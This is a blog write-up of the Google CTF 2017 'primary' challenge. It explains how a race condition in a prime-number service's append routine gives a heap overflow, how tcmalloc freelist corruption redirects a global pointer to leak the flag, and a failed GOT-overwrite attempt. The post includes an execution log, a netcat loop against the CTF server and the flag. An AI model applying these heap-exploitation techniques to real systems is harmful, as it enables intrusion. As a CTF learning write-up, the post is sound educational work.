2017年6月21日 星期三

[Write-up] Google CTF 2017 - pwn474 primary

Before Start

This challenge took me 40 hours (including sleeping) to solve! One reason is I'm not familiar with race condition bugs. Main reason is because there're too many strategies (seems) can solve it. I have tried at least four kinds of exploitation and finally got the correct and stable one. I will show the final solution I got and mention why other solutions failed.

Another reason hard to solve this challenge is that race condition is difficult to debug because whenever a debugger presents, the race condition will always fail 😢

Basic Info



Challenge's attachment files can be found in my github repo.

Source code, Makefile, and binary are given.
checksec of binary:

The Makefile is important, it reveals the compile options are:
$ clang-3.8 primary.c -Wall -Wextra -std=gnu11 -lpthread -O0 -o primary -ltcmalloc

It uses tcmalloc as memory allocator which is a package in google-perftools. This link has a nice explanation of it's malloc/free mechanism. I will briefly introduce it as well and explain how to exploit this kind of heap later.


Introduction

This section goes through what the binary is doing for readers not familiar with this challenge yet. If you have already read the source code you can skip to Vulnerability.


This is a prime examination service. Following is the work flow:

  1. Input at most N=256 x 4096 64-bits integers.
  2. Create N / 4096 threads, each thread will process 4096 integers.
  3. In each thread:
    1. Process 512 integers each round, so there will be 4096/512=8 rounds.
    2. In each round, use Miller-Rabin primality test to find primes in these 512 numbers.
    3. Append found primes to a global prime buffer.
  4. After all threads finished, show the prime numbers found.
And the flag has already been read to a global buffer, so we don't need RCE to solve this challenge.

By the way, the last step contains a strange bug:
for (size_t i = 0; i < primes.count; i++) {
  printf("%zu ", primes.numbers[primes.count - 1]);
}
At first glance this code should print all the primes found, while it writes primes.numbers[primes.count - 1] instead of primes.numbers[i]! So only the last prime will be printed out count times.

Vulnerability

The main vulnerability is there's no lock when appending primes to the global variable (Well, it does lock things but in a wrong way).

So threads can enter the append function simultaneously:
/*
typedef struct {
  size_t count;
  uint64_t* numbers;
} number_list;
*/
                                             // destination is a global variable
130:  void append(const number_list* source, number_list* destination) {
131:    size_t new_count = destination->count + source->count;
132:  
133:    if (source->count == 0 || new_count < destination->count)
134:      return;
135:  
136:    uint64_t* old_numbers = destination->numbers;
137:    destination->numbers = malloc(new_count * sizeof(uint64_t));
138:  
139:    if (destination->numbers == NULL)
140:      return;
141:  
142:    if (destination->count) {
143:      memcpy(destination->numbers, old_numbers,
144:             destination->count * sizeof(uint64_t));
145:      free(old_numbers);
146:    }
147:  
148:    memcpy(destination->numbers + destination->count, source->numbers,
149:           source->count * sizeof(uint64_t));
150:  
151:    destination->count = new_count;
152:  }

There're many ways to exploit this race condition. To prevent confusing readers, here describes the final solution I got and discusses other potential solutions in the end of this writeup.

Race condition
At line 137, the global buffer pointer has been reassigned, while the global count is assigned at line 151. This makes we can 'cheat' threads what the true buffer size is.

Now let's describe how to use three threads to create a heap overflow.

The overflow occurs at line 143:
143:    memcpy(destination->numbers, old_numbers,
144:           destination->count * sizeof(uint64_t));
If the value of destination->count has been changed by another thread, this memcpy will cause a heap overflow.


The details of the race strategy are shown as follows:
(Name the three threads as A, B, C)

What happenddest->countdest->numbers
A malloc(a)0buf_a
A finishedabuf_a
B malloc(a+b)abuf_ab
C malloc(a+c)abuf_ac
B finisheda+bbuf_ac
C at line 143:
memcpy(buf_ac, buf_ab, a+b)
a+cbuf_ac

Thread C expect count still be a, while thread B has changed count to a+b.

TCMalloc

Now we have heap overflow, it's time to understand the mechanism of tcmalloc.

There's a global pool (central cache) and one local pool (thread cache) for each thread.

When a thread calls malloc, it will:

  1. Find if local pool has proper size to allocate.
  2. If not, allocate from global pool (always success).
When a thread calls free:
  1. Put the freed address into local pool.

It can't be simpler!


Size would be rounded (in some way) when allocating. For example, all allocations in the range 1281 to 1408 bytes are rounded up to 1408. And the same size-classes in pools (both global and local) are single linked-lists.

And one more thing, when a thread finished, memories in its local pool would be returned to the global one. I didn't notice this mechanism so felt confused why my exploit not worked for a little time.

Exploitation

Remains are our favorite(?) heap exploitation.. but with tcmalloc.

I have to say it's much easier than exploit glibc's ptmalloc, while dealing with multi-threads always makes life harder.

We already have heap overflow, use it we can overwrite the single linked-list pointer, then tcmalloc will allocate the address we faked (just like fastbin corruption).

And the best news is tcmalloc doesn't do any security check, fake any pointers can do the magic.

My exploitation strategy is to allocate the address before &primes and overwrite primes.numbers to location near flag. After all threads ended, the binary will print out the content of flag.

Visualization:
malloc here
|
V-------+---------------+----------------+------+
| ..... |  primes.count | primes.numbers | args |
+-------+---------------+----------------+------+
-----------------overwrite--------------->

Don't overwrite the mutex in args, otherwise may lead some threads to deadlock.

The full exploitation used five threads. Three for creating heap overflow and two for allocating the fake address.

The execution log:
$ ./primary.patch < payload
[A] malloc(0x500) = 0x1648000
[A] line 148: memcpy(0x1648000, <src>, 0x500)
[B] malloc(0x588) = 0x164c000
[B] line 143: memcpy(0x164c000, 0x1648000, 0x500)
[C] malloc(0x518) = 0x1650000
[B] free(0x1648000)
[B] line 148: memcpy(0x1650500, <src>, 0x88) // overflow but will be overwritten later
[C] line 143: memcpy(0x1650000, 0x164c000, 0x588) // overflow! set *0x1650580=FAKE_ADDR
[C] free(0x164c000)
[C] line 148: memcpy(0x1650588, <src>, 0x18) // another overflow but don't care
[D] malloc(0x520) = 0x1650580
[E] malloc(0x520) = FAKE_ADDR
...
[E] line 143: memcpy(FAKE_ADDR, 0x1650000, 0x518)
...
Note: This is not the only execution flow that can success overflow. Thread B and thread C can run in different order but with same overflow result. That's why this exploitation has high probability of success.

Snapshot of my exploit script:

Variable 'fat' is a composite number that makes the primality test not so fast. I use this to control the working order of threads.

And, remember the strange bug I mentioned? It only shows the last prime, so my exploitation can only leak 8 bytes of flag each time. In my final exploit script, I use ARGV to specify which part of flag wants to leak.

This exploitation has successful rate approximate to 2%.

A big number will appear when the race condition success:
$ for i in {0..100}; do echo $i; nc primary.ctfcompetition.com < payload; done
....
44
7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 ...
45
8316293036412138595 8316293036412138595 8316293036412138595 ...
src/tcmalloc.cc:278] Attempt to free invalid pointer 0x300

Pack this large number can see part of flag:
In [210]: p64(8316293036412138595)
Out[210]: 'ctf{this'

Full script is here

Other Exploitation And Discussion

Control rip
Notice that there's a hint of this challenge:
Hint: Maybe you don't need a full RCE? Are there any interesting addresses that influence control flow?

Yes, there's a backdoor in binary, just control rip to 0x401136 then it will print out the full flag.

You may wonder why I didn't use the common exploit strategy that overwrite GOT to control rip. Well, I tried but failed, difficulties I faced are listed as follows:

  1. Appended numbers are all primes, so we have to find a prime near GOT address. This constraint is fulfillable.
  2. 0x401136 of course is not a prime, but there's a way to write this number on GOT. (Hint: 0x2f000000004011 and 0x3600000000000005 are primes)
  3. To create heap overflow, the allocated size has to be large enough. We have to make sure all threads survive after we f**ked up almost the whole GOT.
  4. Finally I bypassed all constraints above, then I saw this in my dmesg:

primary[30468]: segfault at 7ffff5e94ff8 ip 0000000000401150 sp 00007ffff5e95000 error 6 in primary[400000+2000]

It failed on call printf, and the reason is the thread couldn't push return address to stack.
I didn't trace why this happened, and I thought this is not an easy issue to solve so I changed my strategy to not control rip.

Another race condition

Let's see the source again:
136:    uint64_t* old_numbers = destination->numbers;
137:    destination->numbers = malloc(new_count * sizeof(uint64_t));
Imagine there's two threads comes to line 136 simultaneously, then they hold the same old_numbers. Later these two threads will both free this address, leads to double free. I used this double free to overwrite GOT successfully but with an extremely low probability. So I dropped this exploitation eventually.

To Debug
As I mentioned before, this challenge is hard to debug because ptrace will influent the timing of context switch.

To debug, I inserted codes to log parameters of free/malloc/memcpy and print the log after all threads finished. Like this:

Just be careful not to create another race condition things 😜

In addition, I patched the ret instruction to infinite loop before threads end so I can see if the tcmalloc's cache layout same as my imagination.

Postscript
This challenge is great! It let me learn how to deal with race condition bugs and the mechanism of tcmalloc. Always excited to solve challenges that make me grow up 😆

Flag: ctf{this-problem-is-a-prime-example-of-race-conditions}

沒有留言:

張貼留言